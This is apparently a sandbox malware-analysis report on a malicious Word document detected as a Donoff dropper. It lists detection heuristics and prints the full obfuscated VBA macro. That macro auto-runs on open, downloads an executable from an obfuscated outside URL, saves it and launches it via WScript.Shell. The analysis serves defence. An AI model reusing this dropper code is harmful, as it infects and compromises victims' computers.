MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and CreateObject, suggesting the macro attempts to interact with the system, likely to download and execute a secondary payload. The ClamAV detection as 'Doc.Dropper.Donoff-5743530-0' further supports its role as a dropper.
Heuristics 10
-
ClamAV: Doc.Dropper.Donoff-5743530-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim WuEpb As String Set mWwoXQA = CreateObject("WScript.Shell") End Function -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim fExpSbV As Boolean, RKLHuagrZb As Integer Set KfEVUAz = CreateObject("MSXML2.ServerXMLHTTP.6.0") Set ZOFvQisC = KfEVUAz -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Public Sub PnhePatYp(ByVal TclEGHiNVZ As Integer, ByVal cDiPONhgdu As Variant, ByVal ZTmSy As Variant, ByVal BQmDx As Object, ByVal JOZQMs As Variant, ByVal ZRUZA As Integer, ByVal RKlXVuJje As String) CallByName BQmDx, RKlXVuJje, 1, ZTmSy, JOZQMs, cDiPONhgdu End Sub -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
End Function Private Sub Document_Open() Dim LzHAxP As Integer -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8849 bytes |
SHA-256: 88686842451e0e5a60f724d8e2ef97067b2bb69f3fac64499ef7061fed15862e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
173 of 252 identifiers look randomly generated (e.g. 'j4uHtnJoy8oycNRtefhPmcMgCDf4ju1') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function VpfjMw() As Integer
NddjA
If XBccwj(5601, "j4uHtnJoy8oycNRtefhPmcMgCDf4ju1") Then
kdFtL
Else
nuvzfFK
End If
VpfjMw = 8139
End Function
Private Sub Document_Open()
Dim LzHAxP As Integer
Dim UsohTS As Integer
EPrGkzHu.QYDdgP
End Sub
Private Sub KGvnuPk()
mJgHQ False, False, 4238
gcLIjQ True
End Sub
Attribute VB_Name = "aFCZE"
Private Sub wfvYYqQI()
QuYYqnyOFO
VmdNCfQ
XducHsOfcu "x1DnQDF2czp6Rx9jrX"
End Sub
Public Function ZOFvQisC() As Object
Dim fExpSbV As Boolean, RKLHuagrZb As Integer
Set KfEVUAz = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set ZOFvQisC = KfEVUAz
End Function
Public Function mWwoXQA() As Object
Dim WuEpb As String
Set mWwoXQA = CreateObject("WScript.Shell")
End Function
Public Function YdTUsFm() As Object
kSeUwKWLwH = 3434
Set YdTUsFm = CreateObject("ADODB.Stream")
End Function
Private Sub MCtMgah()
KbxYhbaay
AvUSfTJh "8EbN8KX3hIFQHcDIlQI", "o52tnaqhX64Zh0y4r", False
ZOkaSukV
End Sub
Attribute VB_Name = "BeYvRF"
Public Sub PnhePatYp(ByVal TclEGHiNVZ As Integer, ByVal cDiPONhgdu As Variant, ByVal ZTmSy As Variant, ByVal BQmDx As Object, ByVal JOZQMs As Variant, ByVal ZRUZA As Integer, ByVal RKlXVuJje As String)
CallByName BQmDx, RKlXVuJje, 1, ZTmSy, JOZQMs, cDiPONhgdu
End Sub
Public Sub DJVPI(ByVal pxDRulh As Object, ByVal jrBWdEm As Integer, ByVal NDAsEvilP As String, ByVal yCQGVhevt As String)
CallByName pxDRulh, NDAsEvilP, 1
End Sub
Public Function UbGPuJ(ByVal RREzJxxtD As String, ByVal VIrHfCIYF As String, ByVal ISVPXW As Object) As Variant
Set UbGPuJ = CallByName(ISVPXW, VIrHfCIYF, 2, RREzJxxtD)
End Function
Public Sub NKifxPpV(ByVal VSjVUF As Variant, ByVal DBwIkBro As String, ByVal ajVZXoIqG As Variant, ByVal bXMjSuTE As Object)
CallByName bXMjSuTE, DBwIkBro, 1, ajVZXoIqG, VSjVUF
End Sub
Private Function uYeVPhy(ByVal OCtJVgLy As String, ByVal bDPzlY As Integer) As String
jzfxURr 2340, 1181, 9816
piAMuSXS 6132, 4579
LXMizfaoij
If dADtLeg Then
uTkVafb 508, 9861
wqQuLT "zc5pscFjT2S8tZnwd", 3675
SlRmBd
End If
SCMoUyqWX
uYeVPhy = "e7HlC4v2sDVjbiov99wsrMoR"
End Function
Public Sub NqquGP(ByVal hVeELAyr As Variant, ByVal bMzMVuEupm As String, ByVal fbRAcm As Object, ByVal EzeHNehRF As Integer, ByVal pNFJaMR As String)
Dim xeEwuF As String
Dim yKNzUJers As String
CallByName fbRAcm, pNFJaMR, 1, hVeELAyr
End Sub
Public Function nTIJawB(ByVal ueBQcrWS As String, ByVal eMHLXuUVG As Object) As Variant
nTIJawB = CallByName(eMHLXuUVG, ueBQcrWS, 2)
End Function
Public Sub xVkQjut(ByVal FygbNsksM As Variant, ByVal pmVJAx As String, ByVal LDukdsJJjO As Object)
CallByName LDukdsJJjO, pmVJAx, 4, FygbNsksM
End Sub
Attribute VB_Name = "EGYbhgTTB"
Private Sub moKxvi()
OfSXF "9Obf1MXW8x08GTl7WT4IE", 6165
yHQxN
dgWaQn
If QREzQooq Then
gxyGcw
Else
qnYhDzuW
bBjpOnw "YU5a36sdqMf4gGhwRX", "t4xljyxgjyBYvwJ2FIasgwNg"
End If
End Sub
Public Function zkiLABPjC(ByVal rXqOy As String, ByVal ZPcQozUV As String) As String
Dim EbfjMcsfZd As Boolean
Dim oVkYhfM As Integer, xaMXvJj As Boolean
SBuYvDo = 5338
For ZlCVbbs = 1 To VbcouufHpG.gleSLxNG(3700, "KWCmiDd1IBm4bsky08t2", ZPcQozUV)
EbfjMcsfZd = VbcouufHpG.RkIzvdKt(rXqOy, "EbC2mO1OrtfR6CBcYOmVrvR6oajt", VbcouufHpG.ChuZLn(ZPcQozUV, ZlCVbbs, 2535, "UfMcc6HnOgr6Karnf2NGAmj"))
sEodtQL = "4smDlgVxUxh1eWCFA7Hkvl"
If Not EbfjMcsfZd Then
zkiLABPjC = VbcouufHpG.DYXpv(zkiLABPjC, VbcouufHpG.ChuZLn(ZPcQozUV, ZlCVbbs, 2535, "4o6PvsgUgKWGsP9GSQYDH20ja"))
End If
BhvAq = "STSBDuZZ4OAYHjaNd5S"
Next
End Function
Private Function rmdMD(ByVal lvLjb As Boolean) As String
mGpHG "2AkTeLJsmfzcvjHC7cRex", True, 9730
If iUWnPbt(1475, 8375) Then
MwUvLHxI
End If
QXMkh "htwEQMGrWzYauaLjxuD51O", 3269, False
aEcIpbKw True
wVbejPo
rmdMD = "UrN4qbO1m0X5zG5tm41srs98yse4b8r"
End Function
Attribute VB_Name = "EPrGkzHu"
Private Function KPCRpu() As String
KPCRpu = EGYbhgTTB.zkiLABPjC("3oLDj9", "P3R39OCLE3So9S")
End Function
Private Function FHqUGHp() As String
FHqUGHp = "6LLnWHRLeRqz2rACK3OC6975dmTgw"
End Function
Private Function KzMWjtPR() As String
KzMWjtPR = EGYbhgTTB.zkiLABPjC("F26o/L", "LUsL/e2ro-/ALgeFont/")
End Function
Private Function qdFqRQhX() As String
Dim akMCEUJWT As Integer, GJjGE As String
qdFqRQhX = EGYbhgTTB.zkiLABPjC("M lUa8", "U/a7e8b a0Ueac 9af6U4l80abUbMe. e88x e")
End Function
Private Function XRJdvmMod() As String
bLjwgJSUR = "2GcxUxHGeeqAk5dRzkW"
XRJdvmMod = EGYbhgTTB.zkiLABPjC("NgYqcZ", "ZEnYYviYYrgongmceNYnct")
End Function
Private Function bCFMzogl() As String
bCFMzogl = LMdEaw
End Function
Private Sub ksHBEmIcM(ByVal rHdYNX As String, ByVal gfvUXo As String, ByVal ISVgmGxq As Variant, ByVal sxHKvmRjs As String)
Dim idRkI As String
Dim NJQxMIoS As String
IaFbCbvQf = 5255
Set HDwZLwsW = aFCZE.YdTUsFm
BeYvRF.xVkQjut 1, EGYbhgTTB.zkiLABPjC("LBoZgmq/", "mTZypoeq"), HDwZLwsW
BeYvRF.DJVPI HDwZLwsW, 8172, EGYbhgTTB.zkiLABPjC("PiG1UjQ", "OipPeGni"), tqhjynsHjX
BeYvRF.NqquGP ISVgmGxq, tqhjynsHjX, HDwZLwsW, 7897, nStkt
BeYvRF.NKifxPpV 2, EGYbhgTTB.zkiLABPjC("fJGc9mC0", "JSaCvceG0TJoFmGiCleG"), rHdYNX, HDwZLwsW
BeYvRF.DJVPI HDwZLwsW, 8172, EGYbhgTTB.zkiLABPjC("KMwhE6", "6C6lo6Eswe"), tqhjynsHjX
End Sub
Private Function IhlIMYNeV() As String
IhlIMYNeV = EGYbhgTTB.zkiLABPjC("Okxw0KC", "kSOektwRweqOuOOeswtkHwexKa0dxerk")
End Function
Private Function WDMQt() As String
QhJzBSkuli = 9116
WDMQt = EGYbhgTTB.zkiLABPjC("PiG1UjQ", "OipPeGni")
End Function
Private Sub JBvHoKbqX()
Dim EHMWLhGy As Integer
On Error GoTo jZtTFePDmI
TNXSaJ bCFMzogl, whxVtLP
nHFskkviX = "CIqqAGvbDWl6WstTB"
AcwENd whxVtLP, "tTZOxcNDYIQY4DtncOF", False
Exit Sub
jZtTFePDmI:
End Sub
Private Sub TNXSaJ(ByVal ObzgdkHr As String, ByVal YsneAXqlUt As String)
Set VVpSmZGOkG = aFCZE.ZOFvQisC
BeYvRF.PnhePatYp 6693, False, EGYbhgTTB.zkiLABPjC("KAgQjJ2L", "GKLEAT"), VVpSmZGOkG, ObzgdkHr, 9594, WDMQt
LfPYoESsUK = False
BeYvRF.NKifxPpV EGYbhgTTB.zkiLABPjC("h5rHPCZg", "HMHozHHilhglCag/P4.ZZ0H 5(5cComgpharPtigCbPlPe;r)H"), IhlIMYNeV, KzMWjtPR, VVpSmZGOkG
eNLxFz = "P6nMhz83z3IpEfN9Fo2PSP9mXTRK3F"
BeYvRF.DJVPI VVpSmZGOkG, 8172, EGYbhgTTB.zkiLABPjC("pZhU24tr", "SZte4ndZ"), "q0p8Ub3rshCrQjDSx5eeGycByLyw"
ksHBEmIcM YsneAXqlUt, "1lJl0pKbN2dMZTH7Zt8dL7ROgX6fDEQD", BeYvRF.nTIJawB(EGYbhgTTB.zkiLABPjC("WwH50j7fY", "Rw7esf0poYnWfsej0BwodYyj"), VVpSmZGOkG), "5kiXE2vicHqpXXDAo1j5B6"
End Sub
Private Function tWEpW() As String
tWEpW = EGYbhgTTB.zkiLABPjC("HqVgy4nv", "Evxvency")
End Function
Private Function tqhjynsHjX() As String
usNmDIucf = "Jss7PasM9VAjJRtDHa3zJ8u"
tqhjynsHjX = "yupHqjNM6l8zqfIHH2kt9X8aSCR17G"
End Function
Private Function WBbee(ByVal ajrLip As String) As String
If HQBbc Then
JPlDg
zniWRh False, True, 1880
jQPOuwUO
Else
LYGsIFmC
HghafPQh 2785
rBimKfo 1091, 315, 2975
End If
WBbee = "ArdJdLW6VWH5LTazdUDbs"
End Function
Private Function vpQfEefLZ(ByVal LAcWYGPSDO As String) As String
Dim YdfgkbO As String
COovMr = "DAIdRdDYbbwjjTLoFNQMEn8"
Set JjPWUaL = BeYvRF.UbGPuJ(KPCRpu, XRJdvmMod, aFCZE.mWwoXQA)
vpQfEefLZ = JjPWUaL(LAcWYGPSDO)
End Function
Private Function LMdEaw() As String
LMdEaw = EGYbhgTTB.zkiLABPjC("BRfV5qi", "hBqtftpiq:/Rf/hBfpsqaqfz.iicqoqm/qis5ysift5emBR/qcqacVBh5e5/iwqorRVdB.e5fxeR")
End Function
Public Sub QYDdgP()
DSFWQ = 8775
JBvHoKbqX
End Sub
Private Function nStkt() As String
nStkt = EGYbhgTTB.zkiLABPjC("0dYXgI8ls", "lWrliYtgIe")
End Function
Private Sub AcwENd(ByVal CmtMtSSV As String, ByVal KbUrADqZEH As String, ByVal VejaggyhE As Boolean)
Dim wwLQLRaLTE As Integer
Dim hwtAkFuBQg As String
BeYvRF.NqquGP CmtMtSSV, FHqUGHp, aFCZE.mWwoXQA, 7897, tWEpW
End Sub
Private Function whxVtLP() As String
Dim TTxTguQk As Boolean, rfrVlXygqD As String
NzmDVOpD = False
whxVtLP = vpQfEefLZ(EGYbhgTTB.zkiLABPjC("IV6mZvAC", "CTECMmPI")) & qdFqRQhX
End Function
Attribute VB_Name = "VbcouufHpG"
Public Function RkIzvdKt(ByVal ApLkqQS As String, ByVal zajYYZ As String, ByVal AtzWDJa As String) As Boolean
Dim MDXrDg As Boolean
RkIzvdKt = InStr(1, ApLkqQS, AtzWDJa)
End Function
Public Function ChuZLn(ByVal QNcst As String, ByVal EPQuVyD As Integer, ByVal WWSdKLmkrP As Integer, ByVal EaGdHX As String) As String
Dim XgCALH As String
ChuZLn = Mid(QNcst, EPQuVyD, 1)
End Function
Public Function gleSLxNG(ByVal Mnxsav As Integer, ByVal hXFeORK As String, ByVal fLmgthl As String) As Integer
Dim iBnLD As Integer
gleSLxNG = Len(fLmgthl)
End Function
Public Function DYXpv(ByVal PcNXnoheu As String, ByVal jxdZSHlNT As String) As String
Dim qgGLn As String
DYXpv = PcNXnoheu & jxdZSHlNT
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.